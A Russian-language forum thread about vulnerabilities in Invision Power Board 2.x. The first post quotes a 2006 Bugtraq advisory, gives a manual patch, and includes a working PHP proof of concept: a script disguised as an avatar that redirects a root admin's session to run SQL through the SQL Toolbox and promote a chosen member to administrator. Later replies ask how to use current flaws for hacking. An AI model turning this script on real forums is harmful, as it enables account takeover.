Уязвимости в IPB 2.*

Статус
В этой теме нельзя размещать новые ответы.

schut123

Писатель
Регистрация
17 Авг 2007
Сообщения
6
Реакции
5
вот я тут выложу информацию о некоторых уязвимостях.
Уязвимым оказался скрипт кп админки. Если поставить вместо ссылки на аватару ссылку на пхп-сплоит, то при просмотре админом (это должен быть рут-админ) акка пользователя через контрпанельку имеется возможность выполнить скуль-комманды через IPB's SQL Toolbox.

Вот сам текст с багтрака:
Код:
From: Rapigator <rapigator_at_yahoo.com>
Date: Wed, 4 Oct 2006 11:58:38 -0700 (PDT)

Invision Power Board Multiple Vulnerabilities
Affects: IPB <=2.1.7
Risk: High

An attack exists where an admin can be redirected and
forced to execute SQL commands through IPB's SQL
Toolbox.

The following requirements must be met for this attack
to take place:
- The database table prefix must be known
- The admin must have access to the SQL Toolbox (any
"root admin")
- The admin must have images and referers turned on in
their browser, and their browser must follow Location
headers (default behaviour for most browsers)
- The admin must view a malicious script as an image
in their browser.

This attack works invisibly to the admin because only
the image is redirected, not the page.


1st method:
In this method, any user can force the admin to
execute SQL commands.

1. A user sets their avatar to the malicious script's
address
2. The admin looks up the user's account in the Admin
CP
3. The user's avatar is shown and the admin is
redirected....


2nd method:
A restricted admin can add any HTML to a forum's
description(including javascript).

1. A restricted admin adds the malicious script as an
image to a forum's description.
2. Upon going to the "Manage Forums" link in Admin CP,
an unrestricted admin will be redirected and the SQL
will be executed.


Example malicious image script:
<?php

//The member id to promote to root admin
$mid = 145;

//The database prefix (usually "ibf_")
$prefix = "ibf_";

if (preg_match('/(.*adsess=[\\w]{32})/',
$_SERVER['HTTP_REFERER'], $admin_loc) and $mid)
{
header("Location:
".$admin_loc[1]."&act=sql&code=runsql&query=UPDATE+{$prefix}members+SET+mgroup%3D4+where +id%3D{$mid}+LIMIT+1");
}

?>

http://seclists.org/bugtraq/2006/Oct/0049.html
Уязвимы версии:
Invision Power Board 2.0.x
Invision Power Board 2.1.0 - 2.1.7
Invision Power Board 2.2 Beta 1

Неуязвимы:
Invision Power Board 2.1.7 (ID: 21013.61005.s)
Invision Power Board 2.2 Beta 2

Не пугайтесь сильно, вот вам Ручное исправление уязвимостей от 05.10.06

Файл ./sources/action_admin/member.php, найти код:
Код
Код:
//-----------------------------------------
            // Avatar?
            //-----------------------------------------

            if ( $r['avatar_location'] and $r['avatar_type'] )
            {
                $avatar = $this->ipsclass->get_avatar( $r['avatar_location'], 1, '25x25', $r['avatar_type'] );

                if ( ! strstr( $avatar, 'width=' ) )
                {
                    $avatar = str_replace( '<img', "<img width='25' height='25'", $avatar );
                }
            }
            else
            {
                $avatar = "<img src='{$this->ipsclass->skin_url}/images/memsearch_head.gif' border='0' />";

заменить на код
Код:
 //-----------------------------------------
            // Avatar?
            //-----------------------------------------

            //-----------------------------------------
            // SECURITY UPDATE: Removing  user avatar
            //-----------------------------------------

            $avatar = "<img src='{$this->ipsclass->skin_url}/images/memsearch_head.gif' border='0' />";


Не забываем нажимать кнопочку "спасибо" =)
 

schut123

Писатель
Регистрация
17 Авг 2007
Сообщения
6
Реакции
5
Никому не интересно? хороше.. я еще нашел уязвимости, но наверное никому они не интересны...
 

unkn0wn

Гуру форума
Регистрация
22 Дек 2006
Сообщения
164
Реакции
81
Именно поэтому на своем форуме я отключил удаленные картинки и аватары. Вообще же маскировка скрипта под картинку - давно изъезженный метод, грамотный одмин такие фени давно знает.

А строить из себя обиженного брось, не разводи детский сад.
 
З

-Зверик-

Прохожие
schut123, если новые 0day то конечно же пость под большим хайдом.

а вот баян с 2006 года не надо....
 

schut123

Писатель
Регистрация
17 Авг 2007
Сообщения
6
Реакции
5
Поищим.. Пока что для булки отпишу..
 

romverru

Писатель
Регистрация
2 Мар 2009
Сообщения
8
Реакции
0
ответ

Интересно бы почитать как эти уязвимости можно использовать для взлома
 

Shotlandec

Постоялец
Регистрация
17 Сен 2007
Сообщения
728
Реакции
162
все это старье... на античате то же уже толком ни чего по IPB не пишут... Есть ли грамотные люди, кто подскажет, что актуально на сегодняшний день? Меня конкретно интересует >=2.2.2. По всем мануалам что смог найти и использовать, получилось только открытие путей сотворить...
 

WuZi

Постоялец
Регистрация
2 Окт 2008
Сообщения
95
Реакции
40
Уязвимости находят, нужно смотреть забугорные багтраки =)

Меня конкретно интересует >=2.2.2.

Вот кое-что нагуглил :





 

ziv

Постоялец
Регистрация
5 Дек 2006
Сообщения
106
Реакции
6
У нас городском форуме под IPB2 ломают через день.
Вот очередной обиженный начал на нем тренироваться, теперь в собщениях через каждую букву выводятся 5 знаков (######).
 

ziv

Постоялец
Регистрация
5 Дек 2006
Сообщения
106
Реакции
6
ziv:
1. в скобках 6 знаков :p
2. и че? если ты хочешь что б тебе помогли, то надо нечто большее
А мне то че помогать?
И вообще ты че здесь посты набираешь? Если есть что поделу - говори, напомню обсуждается уязвимость IPB 2.
 
Статус
В этой теме нельзя размещать новые ответы.
Сверху